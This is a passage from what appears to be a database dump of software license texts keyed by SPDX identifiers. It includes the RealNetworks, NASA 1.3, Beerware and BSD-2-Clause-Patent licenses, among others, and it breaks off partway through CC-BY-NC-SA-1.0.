OR ANY CONTRIBUTOR BE LIABLE FOR ANY INCIDENTAL, SPECIAL, INDIRECT\nOR CONSEQUENTIAL DAMAGES ARISING OUT OF OR RELATING TO THIS LICENSE OR YOUR\nUSE OR INABILITY TO USE THE COVERED CODE, OR ANY PORTION THEREOF, WHETHER\nUNDER A THEORY OF CONTRACT, WARRANTY, TORT (INCLUDING NEGLIGENCE OR STRICT\nLIABILITY), PRODUCTS LIABILITY OR OTHERWISE, EVEN IF LICENSOR OR SUCH CONTRIBUTOR\nHAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES AND NOTWITHSTANDING THE\nFAILURE OF ESSENTIAL PURPOSE OF ANY REMEDY. SOME JURISDICTIONS DO NOT ALLOW\nTHE LIMITATION OF LIABILITY OF INCIDENTAL OR CONSEQUENTIAL DAMAGES, SO THIS\nLIMITATION MAY NOT APPLY TO YOU. In no event shall Licensor\'s total liability\nto You for all damages (other than as may be required by applicable law) under\nthis License exceed the amount of ten dollars ($10.00).\n\n10. Ownership. Subject to the licenses granted under this License, each Contributor\nretains all rights, title and interest in and to any Modifications made by\nsuch Contributor. Licensor retains all rights, title and interest in and to\nthe Original Code and any Modifications made by or on behalf of Licensor (\"Licensor\nModifications\"), and such Licensor Modifications will not be automatically\nsubject to this License. Licensor may, at its sole discretion, choose to license\nsuch Licensor Modifications under this License, or on different terms from\nthose contained in this License or may choose not to license them at all.\n\n 11. Termination.\n\n11.1 Term and Termination. The term of this License is perpetual unless terminated\nas provided below. This License and the rights granted hereunder will terminate:\n\n(a) automatically without notice from Licensor if You fail to comply with\nany term(s) of this License and fail to cure such breach within 30 days of\nbecoming aware of such breach;\n\n(b) immediately in the event of the circumstances described in Section 12.5(b);\nor\n\n(c) automatically without notice from Licensor if You, at any time during\nthe term of this License, commence an action for patent infringement against\nLicensor (including by cross-claim or counter claim in a lawsuit);\n\n(d) upon written notice from Licensor if You, at any time during the term\nof this License, commence an action for patent infringement against any third\nparty alleging that the Covered Code itself (excluding combinations with other\nsoftware or hardware) infringes any patent (including by cross-claim or counter\nclaim in a lawsuit).\n\n11.2 Effect of Termination. Upon termination, You agree to immediately stop\nany further use, reproduction, modification, sublicensing and distribution\nof the Covered Code and to destroy all copies of the Covered Code that are\nin your possession or control. All sublicenses to the Covered Code which have\nbeen properly granted prior to termination shall survive any termination of\nthis License. Provisions which, by their nature, should remain in effect beyond\nthe termination of this License shall survive, including but not limited to\nSections 3, 5, 8, 9, 10, 11, 12.2 and 13. No party will be liable to any other\nfor compensation, indemnity or damages of any sort solely as a result of terminating\nthis License in accordance with its terms, and termination of this License\nwill be without prejudice to any other right or remedy of any party.\n\n 12. Miscellaneous.\n\n12.1 Government End Users. The Covered Code is a \"commercial item\" as defined\nin FAR 2.101. Government software and technical data rights in the Covered\nCode include only those rights customarily provided to the public as defined\nin this License. This customary commercial license in technical data and software\nis provided in accordance with FAR 12.211 (Technical Data) and 12.212 (Computer\nSoftware) and, for Department of Defense purchases, DFAR 252.227-7015 (Technical\nData -- Commercial Items) and 227.7202-3 (Rights in Commercial Computer Software\nor Computer Software Documentation). Accordingly, all U.S. Government End\nUsers acquire Covered Code with only those rights set forth herein.\n\n12.2 Relationship of Parties. This License will not be construed as creating\nan agency, partnership, joint venture or any other form of legal association\nbetween or among You, Licensor or any Contributor, and You will not represent\nto the contrary, whether expressly, by implication, appearance or otherwise.\n\n12.3 Independent Development. Nothing in this License will impair Licensor\'s\nright to acquire, license, develop, have others develop for it, market and/or\ndistribute technology or products that perform the same or similar functions\nas, or otherwise compete with, Modifications, Derivative Works, technology\nor products that You may develop, produce, market or distribute.\n\n12.4 Waiver; Construction. Failure by Licensor or any Contributor to enforce\nany provision of this License will not be deemed a waiver of future enforcement\nof that or any other provision. Any law or regulation which provides that\nthe language of a contract shall be construed against the drafter will not\napply to this License.\n\n12.5 Severability. (a) If for any reason a court of competent jurisdiction\nfinds any provision of this License, or portion thereof, to be unenforceable,\nthat provision of the License will be enforced to the maximum extent permissible\nso as to effect the economic benefits and intent of the parties, and the remainder\nof this License will continue in full force and effect. (b) Notwithstanding\nthe foregoing, if applicable law prohibits or restricts You from fully and/or\nspecifically complying with Sections 2 and/or 3 or prevents the enforceability\nof either of those Sections, this License will immediately terminate and You\nmust immediately discontinue any use of the Covered Code and destroy all copies\nof it that are in your possession or control.\n\n12.6 Dispute Resolution. Any litigation or other dispute resolution between\nYou and Licensor relating to this License shall take place in the Seattle,\nWashington, and You and Licensor hereby consent to the personal jurisdiction\nof, and venue in, the state and federal courts within that District with respect\nto this License. The application of the United Nations Convention on Contracts\nfor the International Sale of Goods is expressly excluded.\n\n12.7 Export/Import Laws. This software is subject to all export and import\nlaws and restrictions and regulations of the country in which you receive\nthe Covered Code and You are solely responsible for ensuring that You do not\nexport, re-export or import the Covered Code or any direct product thereof\nin violation of any such restrictions, laws or regulations, or without all\nnecessary authorizations.\n\n12.8 Entire Agreement; Governing Law. This License constitutes the entire\nagreement between the parties with respect to the subject matter hereof. This\nLicense shall be governed by the laws of the United States and the State of\nWashington.\n\nWhere You are located in the province of Quebec, Canada, the following clause\napplies: The parties hereby confirm that they have requested that this License\nand all related documents be drafted in English. Les parties ont exigé que\nle présent contrat et tous les documents connexes soient rédigés en anglais.\nEXHIBIT A.\n\n\" Copyright (c) 1995-2002 RealNetworks, Inc. and/or its licensors. All Rights\nReserved.\n\nThe contents of this file, and the files included with this file, are subject\nto the current version of the RealNetworks Public Source License Version 1.0\n(the \"RPSL\") available at https://www.helixcommunity.org/content/rpsl unless\nyou have licensed the file under the RealNetworks Community Source License\nVersion 1.0 (the \"RCSL\") available at https://www.helixcommunity.org/content/rcsl,\nin which case the RCSL will apply. You may also obtain the license terms directly\nfrom RealNetworks. You may not use this file except in compliance with the\nRPSL or, if you have a valid RCSL with RealNetworks applicable to this file,\nthe RCSL. Please see the applicable RPSL or RCSL for the rights, obligations\nand limitations governing use of the contents of the file.\n\nThis file is part of the Helix DNA Technology. RealNetworks is the developer\nof the Original code and owns the copyrights in the portions it created.\n\nThis file, and the files included with this file, is distributed and made\navailable on an \'AS IS\' basis, WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS\nOR IMPLIED, AND REALNETWORKS HEREBY DISCLAIMS ALL SUCH WARRANTIES, INCLUDING\nWITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR\nPURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.\n\nContributor(s): ____________________________________\n\nTechnology Compatibility Kit Test Suite(s) Location (if licensed under the\nRCSL): _____ \"\n\nObject Code Notice: Helix DNA Client technology included. Copyright (c) RealNetworks,\nInc., 1995-2002. All rights reserved.\n\nEXHIBIT B\n\nCompatible Source Licenses for the RealNetworks Public Source License. The\nfollowing list applies to the most recent version of the license as of October\n25, 2002, unless otherwise indicated.\n\nAcademic Free License\n\nApache Software License\n\nApple Public Source License\n\nArtistic license\n\nAttribution Assurance Licenses\n\nBSD license\n\nCommon Public License1\n\nEiffel Forum License\n\nGNU General Public License (GPL)1\n\nGNU Library or \"Lesser\" General Public License (LGPL)1\n\nIBM Public License\n\nIntel Open Source License\n\nJabber Open Source License\n\nMIT license\n\nMITRE Collaborative Virtual Workspace License (CVW License)\n\nMotosoto License\n\nMozilla Public License 1.0 (MPL)\n\nMozilla Public License 1.1 (MPL)\n\nNokia Open Source License\n\nOpen Group Test Suite License\n\nPython Software Foundation License\n\nRicoh Source Code Public License\n\nSun Industry Standards Source License (SISSL)\n\nSun Public License\n\nUniversity of Illinois/NCSA Open Source License\n\nVovida Software License v. 1.0\n\nW3C License\n\nX.Net License\n\nZope Public License\n\nzlib/libpng license\n\n1Note: because this license contains certain reciprocal licensing terms that\npurport to extend to independently developed code, You may be prohibited under\nthe terms of this otherwise compatible license from using code licensed under\nits terms with Covered Code because Covered Code may only be licensed under\nthe RealNetworks Public Source License. Any attempt to apply non RPSL license\nterms, including without limitation the GPL, to Covered Code is expressly\nforbidden. You are responsible for ensuring that Your use of Compatible Source\nLicensed code does not violate either the RPSL or the Compatible Source License.\n\nThe latest version of this list can be found at: https://www.helixcommunity.org/content/complicense\n\nEXHIBIT C\n\nRealNetworks\' Trademark policy.\n\nRealNetworks defines the following trademarks collectively as \"Licensor Trademarks\":\n\"RealNetworks\", \"RealPlayer\", \"RealJukebox\", \"RealSystem\", \"RealAudio\", \"RealVideo\",\n\"RealOne Player\", \"RealMedia\", \"Helix\" or any other trademarks or trade names\nbelonging to RealNetworks.\n\nRealNetworks \"Licensor Trademark Policy\" forbids any use of Licensor Trademarks\nexcept as permitted by and in strict compliance at all times with RealNetworks\'\nthird party trademark usage guidelines which are posted at www.realnetworks.com/info/helixlogo.html.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(100,'DSDP','COPYRIGHT NOTIFICATION\n\n(C) COPYRIGHT 2004 UNIVERSITY OF CHICAGO\n\nThis program discloses material protectable under copyright laws of the United\nStates. Permission to copy and modify this software and its documentation\nis hereby granted, provided that this notice is retained thereon and on all\ncopies or modifications. The University of Chicago makes no representations\nas to the suitability and operability of this software for any purpose. It\nis provided \"as is\"; without express or implied warranty. Permission is hereby\ngranted to use, reproduce, prepare derivative works, and to redistribute to\nothers, so long as this original copyright notice is retained. Any publication\nresulting from research that made use of this software should cite this document.\n\nThis software was authored by:\n\nSteven J. Benson Mathematics and Computer Science Division Argonne National\nLaboratory Argonne IL 60439\n\nYinyu Ye Department of Management Science and Engineering Stanford University\nStanford, CA U.S.A\n\nAny questions or comments on the software may be directed to benson@mcs.anl.gov\nor yinyu-ye@stanford.edu\n\nArgonne National Laboratory with facilities in the states of Illinois and\nIdaho, is owned by The United States Government, and operated by the University\nof Chicago under provision of a contract with the Department of Energy.\n\nDISCLAIMER\n\nTHIS PROGRAM WAS PREPARED AS AN ACCOUNT OF WORK SPONSORED BY AN AGENCY OF\nTHE UNITED STATES GOVERNMENT. NEITHER THE UNITED STATES GOVERNMENT NOR ANY\nAGENCY THEREOF, NOR THE UNIVERSITY OF CHICAGO, NOR ANY OF THEIR EMPLOYEES\nOR OFFICERS, MAKES ANY WARRANTY, EXPRESS OR IMPLIED, OR ASSUMES ANY LEGAL\nLIABILITY OR RESPONSIBILITY FOR THE ACCURACY, COMPLETENESS, OR USEFULNESS\nOF ANY INFORMATION, APPARATUS, PRODUCT, OR PROCESS DISCLOSED, OR REPRESENTS\nTHAT ITS USE WOULD NOT INFRINGE PRIVATELY OWNED RIGHTS. REFERENCE HEREIN TO\nANY SPECIFIC COMMERCIAL PRODUCT, PROCESS, OR SERVICE BY TRADE NAME, TRADEMARK,\nMANUFACTURER, OR OTHERWISE, DOES NOT NECESSARILY CONSTITUTE OR IMPLY ITS ENDORSEMENT,\nRECOMMENDATION, OR FAVORING BY THE UNITED STATES GOVERNMENT OR ANY AGENCY\nTHEREOF. THE VIEW AND OPINIONS OF AUTHORS EXPRESSED HEREIN DO NOT NECESSARILY\nSTATE OR REFLECT THOSE OF THE UNITED STATES GOVERNMENT OR ANY AGENCY THEREOF.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(101,'eCos-exception-2.0','As a special exception, if other files instantiate templates or use macros or inline functions from this file, or you compile this file and link it with other works to produce a work based on this file, this file does not by itself cause the resulting work to be covered by the GNU General Public License. However the source code for this file must still be made available in accordance with section (3) of the GNU General Public License.\n\nThis exception does not invalidate any other reasons why a work based on this file might be covered by the GNU General Public License.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(102,'NASA-1.3','NASA OPEN SOURCE AGREEMENT VERSION 1.3\n\nTHIS OPEN SOURCE AGREEMENT (\"AGREEMENT\") DEFINES THE RIGHTS OF USE, REPRODUCTION,\nDISTRIBUTION, MODIFICATION AND REDISTRIBUTION OF CERTAIN COMPUTER SOFTWARE\nORIGINALLY RELEASED BY THE UNITED STATES GOVERNMENT AS REPRESENTED BY THE\nGOVERNMENT AGENCY LISTED BELOW (\"GOVERNMENT AGENCY\"). THE UNITED STATES GOVERNMENT,\nAS REPRESENTED BY GOVERNMENT AGENCY, IS AN INTENDED THIRD-PARTY BENEFICIARY\nOF ALL SUBSEQUENT DISTRIBUTIONS OR REDISTRIBUTIONS OF THE SUBJECT SOFTWARE.\nANYONE WHO USES, REPRODUCES, DISTRIBUTES, MODIFIES OR REDISTRIBUTES THE SUBJECT\nSOFTWARE, AS DEFINED HEREIN, OR ANY PART THEREOF, IS, BY THAT ACTION, ACCEPTING\nIN FULL THE RESPONSIBILITIES AND OBLIGATIONS CONTAINED IN THIS AGREEMENT.\n\nGovernment Agency: _______________\n\nGovernment Agency Original Software Designation: _______________\n\nGovernment Agency Original Software Title: _______________\n\nUser Registration Requested. Please Visit http://_______________\n\nGovernment Agency Point of Contact for Original Software: _______________\n\n \n\n DEFINITIONS\n\nA. \"Contributor\" means Government Agency, as the developer of the Original\nSoftware, and any entity that makes a Modification.\n\nB. \"Covered Patents\" mean patent claims licensable by a Contributor that are\nnecessarily infringed by the use or sale of its Modification alone or when\ncombined with the Subject Software.\n\nC. \"Display\" means the showing of a copy of the Subject Software, either directly\nor by means of an image, or any other device.\n\nD. \"Distribution\" means conveyance or transfer of the Subject Software, regardless\nof means, to another.\n\nE. \"Larger Work\" means computer software that combines Subject Software, or\nportions thereof, with software separate from the Subject Software that is\nnot governed by the terms of this Agreement.\n\nF. \"Modification\" means any alteration of, including addition to or deletion\nfrom, the substance or structure of either the Original Software or Subject\nSoftware, and includes derivative works, as that term is defined in the Copyright\nStatute, 17 USC 101. However, the act of including Subject Software as part\nof a Larger Work does not in and of itself constitute a Modification.\n\nG. \"Original Software\" means the computer software first released under this\nAgreement by Government Agency with Government Agency designation _______________\nand entitled _______________ , including source code, object code and accompanying\ndocumentation, if any.\n\nH. \"Recipient\" means anyone who acquires the Subject Software under this Agreement,\nincluding all Contributors.\n\nI. \"Redistribution\" means Distribution of the Subject Software after a Modification\nhas been made.\n\nJ. \"Reproduction\" means the making of a counterpart, image or copy of the\nSubject Software.\n\nK. \"Sale\" means the exchange of the Subject Software for money or equivalent\nvalue.\n\nL. \"Subject Software\" means the Original Software, Modifications, or any respective\nparts thereof.\n\nM. \"Use\" means the application or employment of the Subject Software for any\npurpose.\n\n \n\n GRANT OF RIGHTS\n\nA. Under Non-Patent Rights: Subject to the terms and conditions of this Agreement,\neach Contributor, with respect to its own contribution to the Subject Software,\nhereby grants to each Recipient a non-exclusive, world-wide, royalty-free\nlicense to engage in the following activities pertaining to the Subject Software:\n\n 1. Use\n\n 2. Distribution\n\n 3. Reproduction\n\n 4. Modification\n\n 5. Redistribution\n\n 6. Display\n\nB. Under Patent Rights: Subject to the terms and conditions of this Agreement,\neach Contributor, with respect to its own contribution to the Subject Software,\nhereby grants to each Recipient under Covered Patents a non-exclusive, world-wide,\nroyalty-free license to engage in the following activities pertaining to the\nSubject Software:\n\n 1. Use\n\n 2. Distribution\n\n 3. Reproduction\n\n 4. Sale\n\n 5. Offer for Sale\n\nC. The rights granted under Paragraph B. also apply to the combination of\na Contributor\'s Modification and the Subject Software if, at the time the\nModification is added by the Contributor, the addition of such Modification\ncauses the combination to be covered by the Covered Patents. It does not apply\nto any other combinations that include a Modification.\n\nD. The rights granted in Paragraphs A. and B. allow the Recipient to sublicense\nthose same rights. Such sublicense must be under the same terms and conditions\nof this Agreement.\n\n \n\n OBLIGATIONS OF RECIPIENT\n\nA. Distribution or Redistribution of the Subject Software must be made under\nthis Agreement except for additions covered under paragraph 3H.\n\n1. Whenever a Recipient distributes or redistributes the Subject Software,\na copy of this Agreement must be included with each copy of the Subject Software;\nand\n\n2. If Recipient distributes or redistributes the Subject Software in any form\nother than source code, Recipient must also make the source code freely available,\nand must provide with each copy of the Subject Software information on how\nto obtain the source code in a reasonable manner on or through a medium customarily\nused for software exchange.\n\nB. Each Recipient must ensure that the following copyright notice appears\nprominently in the Subject Software:\n\n[Government Agency will insert the applicable copyright notice in each agreement\naccompanying the initial distribution of original software and remove this\nbracketed language.]\n\n[The following copyright notice will be used if created by a contractor pursuant\nto Government Agency contract and rights obtained from creator by assignment.\nGovernment Agency will insert the year and its Agency designation and remove\nthe bracketed language.] Copyright (c) {YEAR} United States Government as\nrepresented by _______________ . All Rights Reserved.\n\n[The following copyright notice will be used if created by civil servants\nonly. Government Agency will insert the year and its Agency designation and\nremove the bracketed language.] Copyright (c) {YEAR} United States Government\nas represented by _______________ . No copyright is claimed in the United\nStates under Title 17, U.S.Code. All Other Rights Reserved.\n\nC. Each Contributor must characterize its alteration of the Subject Software\nas a Modification and must identify itself as the originator of its Modification\nin a manner that reasonably allows subsequent Recipients to identify the originator\nof the Modification. In fulfillment of these requirements, Contributor must\ninclude a file (e.g., a change log file) that describes the alterations made\nand the date of the alterations, identifies Contributor as originator of the\nalterations, and consents to characterization of the alterations as a Modification,\nfor example, by including a statement that the Modification is derived, directly\nor indirectly, from Original Software provided by Government Agency. Once\nconsent is granted, it may not thereafter be revoked.\n\nD. A Contributor may add its own copyright notice to the Subject Software.\nOnce a copyright notice has been added to the Subject Software, a Recipient\nmay not remove it without the express permission of the Contributor who added\nthe notice.\n\nE. A Recipient may not make any representation in the Subject Software or\nin any promotional, advertising or other material that may be construed as\nan endorsement by Government Agency or by any prior Recipient of any product\nor service provided by Recipient, or that may seek to obtain commercial advantage\nby the fact of Government Agency\'s or a prior Recipient\'s participation in\nthis Agreement.\n\nF. In an effort to track usage and maintain accurate records of the Subject\nSoftware, each Recipient, upon receipt of the Subject Software, is requested\nto register with Government Agency by visiting the following website: _______________\n. Recipient\'s name and personal information shall be used for statistical\npurposes only. Once a Recipient makes a Modification available, it is requested\nthat the Recipient inform Government Agency at the web site provided above\nhow to access the Modification.\n\n[Alternative paragraph for use when a web site for release and monitoring\nof subject software will not be supported by releasing Government Agency]\nIn an effort to track usage and maintain accurate records of the Subject Software,\neach Recipient, upon receipt of the Subject Software, is requested to provide\nGovernment Agency, by e-mail to the Government Agency Point of Contact listed\nin clause 5.F., the following information: _______________ . Recipient\'s name\nand personal information shall be used for statistical purposes only. Once\na Recipient makes a Modification available, it is requested that the Recipient\ninform Government Agency, by e-mail to the Government Agency Point of Contact\nlisted in clause 5.F., how to access the Modification.\n\nG. Each Contributor represents that that its Modification is believed to be\nContributor\'s original creation and does not violate any existing agreements,\nregulations, statutes or rules, and further that Contributor has sufficient\nrights to grant the rights conveyed by this Agreement.\n\nH. A Recipient may choose to offer, and to charge a fee for, warranty, support,\nindemnity and/or liability obligations to one or more other Recipients of\nthe Subject Software. A Recipient may do so, however, only on its own behalf\nand not on behalf of Government Agency or any other Recipient. Such a Recipient\nmust make it absolutely clear that any such warranty, support, indemnity and/or\nliability obligation is offered by that Recipient alone. Further, such Recipient\nagrees to indemnify Government Agency and every other Recipient for any liability\nincurred by them as a result of warranty, support, indemnity and/or liability\noffered by such Recipient.\n\nI. A Recipient may create a Larger Work by combining Subject Software with\nseparate software not governed by the terms of this agreement and distribute\nthe Larger Work as a single product. In such case, the Recipient must make\nsure Subject Software, or portions thereof, included in the Larger Work is\nsubject to this Agreement.\n\nJ. Notwithstanding any provisions contained herein, Recipient is hereby put\non notice that export of any goods or technical data from the United States\nmay require some form of export license from the U.S. Government. Failure\nto obtain necessary export licenses may result in criminal liability under\nU.S. laws. Government Agency neither represents that a license shall not be\nrequired nor that, if required, it shall be issued. Nothing granted herein\nprovides any such export license.\n\n \n\n DISCLAIMER OF WARRANTIES AND LIABILITIES; WAIVER AND INDEMNIFICATION\n\nA. No Warranty: THE SUBJECT SOFTWARE IS PROVIDED \"AS IS\" WITHOUT ANY WARRANTY\nOF ANY KIND, EITHER EXPRESSED, IMPLIED, OR STATUTORY, INCLUDING, BUT NOT LIMITED\nTO, ANY WARRANTY THAT THE SUBJECT SOFTWARE WILL CONFORM TO SPECIFICATIONS,\nANY IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE,\nOR FREEDOM FROM INFRINGEMENT, ANY WARRANTY THAT THE SUBJECT SOFTWARE WILL\nBE ERROR FREE, OR ANY WARRANTY THAT DOCUMENTATION, IF PROVIDED, WILL CONFORM\nTO THE SUBJECT SOFTWARE. THIS AGREEMENT DOES NOT, IN ANY MANNER, CONSTITUTE\nAN ENDORSEMENT BY GOVERNMENT AGENCY OR ANY PRIOR RECIPIENT OF ANY RESULTS,\nRESULTING DESIGNS, HARDWARE, SOFTWARE PRODUCTS OR ANY OTHER APPLICATIONS RESULTING\nFROM USE OF THE SUBJECT SOFTWARE. FURTHER, GOVERNMENT AGENCY DISCLAIMS ALL\nWARRANTIES AND LIABILITIES REGARDING THIRD-PARTY SOFTWARE, IF PRESENT IN THE\nORIGINAL SOFTWARE, AND DISTRIBUTES IT \"AS IS.\"\n\nB. Waiver and Indemnity: RECIPIENT AGREES TO WAIVE ANY AND ALL CLAIMS AGAINST\nTHE UNITED STATES GOVERNMENT, ITS CONTRACTORS AND SUBCONTRACTORS, AS WELL\nAS ANY PRIOR RECIPIENT. IF RECIPIENT\'S USE OF THE SUBJECT SOFTWARE RESULTS\nIN ANY LIABILITIES, DEMANDS, DAMAGES, EXPENSES OR LOSSES ARISING FROM SUCH\nUSE, INCLUDING ANY DAMAGES FROM PRODUCTS BASED ON, OR RESULTING FROM, RECIPIENT\'S\nUSE OF THE SUBJECT SOFTWARE, RECIPIENT SHALL INDEMNIFY AND HOLD HARMLESS THE\nUNITED STATES GOVERNMENT, ITS CONTRACTORS AND SUBCONTRACTORS, AS WELL AS ANY\nPRIOR RECIPIENT, TO THE EXTENT PERMITTED BY LAW. RECIPIENT\'S SOLE REMEDY FOR\nANY SUCH MATTER SHALL BE THE IMMEDIATE, UNILATERAL TERMINATION OF THIS AGREEMENT.\n\n \n\n GENERAL TERMS\n\nA. Termination: This Agreement and the rights granted hereunder will terminate\nautomatically if a Recipient fails to comply with these terms and conditions,\nand fails to cure such noncompliance within thirty (30) days of becoming aware\nof such noncompliance. Upon termination, a Recipient agrees to immediately\ncease use and distribution of the Subject Software. All sublicenses to the\nSubject Software properly granted by the breaching Recipient shall survive\nany such termination of this Agreement.\n\nB. Severability: If any provision of this Agreement is invalid or unenforceable\nunder applicable law, it shall not affect the validity or enforceability of\nthe remainder of the terms of this Agreement.\n\nC. Applicable Law: This Agreement shall be subject to United States federal\nlaw only for all purposes, including, but not limited to, determining the\nvalidity of this Agreement, the meaning of its provisions and the rights,\nobligations and remedies of the parties.\n\nD. Entire Understanding: This Agreement constitutes the entire understanding\nand agreement of the parties relating to release of the Subject Software and\nmay not be superseded, modified or amended except by further written agreement\nduly executed by the parties.\n\nE. Binding Authority: By accepting and using the Subject Software under this\nAgreement, a Recipient affirms its authority to bind the Recipient to all\nterms and conditions of this Agreement and that that Recipient hereby agrees\nto all terms and conditions herein.\n\nF. Point of Contact: Any Recipient contact with Government Agency is to be\ndirected to the designated representative as follows: _______________ .\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(103,'Fair','Fair License\n\n<Copyright Information>\n\nUsage of the works is permitted provided that this instrument is retained\nwith the works, so that any entity that uses the works is notified of this\ninstrument.\n\nDISCLAIMER: THE WORKS ARE WITHOUT WARRANTY.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(104,'Beerware','\"THE BEER-WARE LICENSE\" (Revision 42):\n\n<phk@FreeBSD.ORG> wrote this file. As long as you retain this notice you can\ndo whatever you want with this stuff. If we meet some day, and you think this\nstuff is worth it, you can buy me a beer in return Poul-Henning Kamp\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(105,'BSD-2-Clause-Patent','Copyright (c) <YEAR> <COPYRIGHT HOLDERS>\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n1. Redistributions of source code must retain the above copyright notice,\nthis list of conditions and the following disclaimer.\n\n2. Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\nSubject to the terms and conditions of this license, each copyright holder\nand contributor hereby grants to those receiving rights under this license\na perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable\n(except for failure to satisfy the conditions of this license) patent license\nto make, have made, use, offer to sell, sell, import, and otherwise transfer\nthis software, where such license applies only to those patent claims, already\nacquired or hereafter acquired, licensable by such copyright holder or contributor\nthat are necessarily infringed by:\n\n(a) their Contribution(s) (the licensed copyrights of copyright holders and\nnon-copyrightable additions of contributors, in source or binary form) alone;\nor\n\n(b) combination of their Contribution(s) with the work of authorship to which\nsuch Contribution(s) was added by such copyright holder or contributor, if,\nat the time the Contribution is added, such addition causes such combination\nto be necessarily infringed. The patent license shall not apply to any other\ncombinations which include the Contribution.\n\nExcept as expressly stated above, no rights or licenses from any copyright\nholder or contributor is granted under this license, whether expressly, by\nimplication, estoppel or otherwise.\n\nDISCLAIMER\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\nARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDERS OR CONTRIBUTORS BE\nLIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE\nUSE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(106,'CC-BY-NC-SA-1.0','Creative Commons Attribution-NonCommercial-ShareAlike 1.0 CREATIVE COMMONS\nCORPORATION IS NOT A LAW FIRM AND DOES NOT PROVIDE LEGAL SERVICES. DISTRIBUTION\nOF THIS DRAFT LICENSE DOES NOT CREATE AN ATTORNEY-CLIENT RELATIONSHIP. CREATIVE\nCOMMONS PROVIDES THIS INFORMATION ON AN \"AS-IS\" BASIS. CREATIVE COMMONS MAKES\nNO WARRANTIES REGARDING THE INFORMATION PROVIDED, AND DISCLAIMS LIABILITY\nFOR DAMAGES RESULTING FROM ITS USE.\n\nLicense\n\nTHE WORK (AS DEFINED BELOW) IS PROVIDED UNDER THE TERMS OF THIS CREATIVE COMMONS\nPUBLIC LICENSE (\"CCPL\" OR \"LICENSE\"). THE WORK IS PROTECTED BY COPYRIGHT AND/OR\nOTHER APPLICABLE LAW. ANY USE OF THE WORK OTHER THAN AS AUTHORIZED UNDER THIS\nLICENSE IS PROHIBITED.\n\nBY EXERCISING ANY RIGHTS TO THE WORK PROVIDED HERE, YOU ACCEPT AND AGREE TO\nBE BOUND BY THE TERMS OF THIS LICENSE. THE LICENSOR GRANTS YOU THE RIGHTS\nCONTAINED HERE IN CONSIDERATION OF YOUR ACCEPTANCE OF SUCH TERMS AND CONDITIONS.\n\n 1. Definitions\n\na. \"Collective Work\" means a work, such as a periodical issue, anthology or\nencyclopedia, in which the Work in its entirety in unmodified form, along\nwith a number of other contributions, constituting separate and independent\nworks in themselves, are assembled into a collective whole. A work that constitutes\na Collective Work will not be considered a Derivative Work (as defined below)\nfor the purposes of this License.\n\nb. \"Derivative Work\" means a work based upon the Work or upon the Work and\nother pre-existing works, such as a translation, musical arrangement, dramatization,\nfictionalization, motion picture version, sound recording, art reproduction,\nabridgment, condensation, or any other form in which the Work may be recast,\ntransformed, or adapted, except that a work that constitutes a Collective\nWork will not be considered a Derivative Work for the purpose of this License.\n\nc. \"Licensor\" means the individual or entity that offers the Work under the\nterms of this License.\n\n d. \"Original Author\" means the individual or entity who created the Work.\n\ne. \"Work\" means the copyrightable work of authorship offered under the terms\nof this License.\n\nf. \"You\" means an individual or entity exercising rights under this License\nwho has not previously violated the terms of this License with respect to\nthe Work, or who has received express permission from the Licensor to exercise\nrights under this License despite a previous violation.\n\n2. Fair Use Rights. Nothing in this license is intended to reduce, limit,\nor restrict any rights arising from fair use, first sale or other limitations\non the exclusive rights of the copyright owner under copyright law or other\napplicable laws.\n\n3. License Grant. Subject to the terms and conditions of this License, Licensor\nhereby grants You a worldwide, royalty-free, non-exclusive, perpetual (for\nthe duration of the applicable copyright) license to exercise the rights in\nthe Work as stated below:\n\na. to reproduce the Work, to incorporate the Work into one or more Collective\nWorks, and to reproduce the Work as incorporated in the Collective Works;\n\n b. to create and reproduce Derivative Works;\n\nc. to distribute copies or phonorecords of, display publicly, perform publicly,\nand perform publicly by means of a digital audio transmission the Work including\nas incorporated in Collective Works;\n\nd. to distribute copies or phonorecords of, display publicly, perform publicly,\nand perform publicly by means of a digital audio transmission Derivative Works;\n\nThe above rights may be exercised in all media and formats whether now known\nor hereafter devised. The above rights include the right to make such modifications\nas are technically necessary to exercise the rights in other media and formats.\nAll rights not expressly granted by Licensor are hereby reserved.\n\n4. Restrictions. The license granted in Section 3 above is expressly made\nsubject to and limited by the following restrictions:\n\na. You may distribute, publicly display, publicly perform, or publicly digitally\nperform the Work only under the terms of this License, and You must include\na copy of, or the Uniform Resource Identifier for, this License with every\ncopy or phonorecord of the Work You distribute, publicly display, publicly\nperform, or publicly digitally perform. You may not offer or impose any terms\non the Work that alter or restrict the terms of this License or the recipients\'\nexercise of the rights granted hereunder. You may not sublicense the Work.\nYou must keep intact all notices that refer to this License and 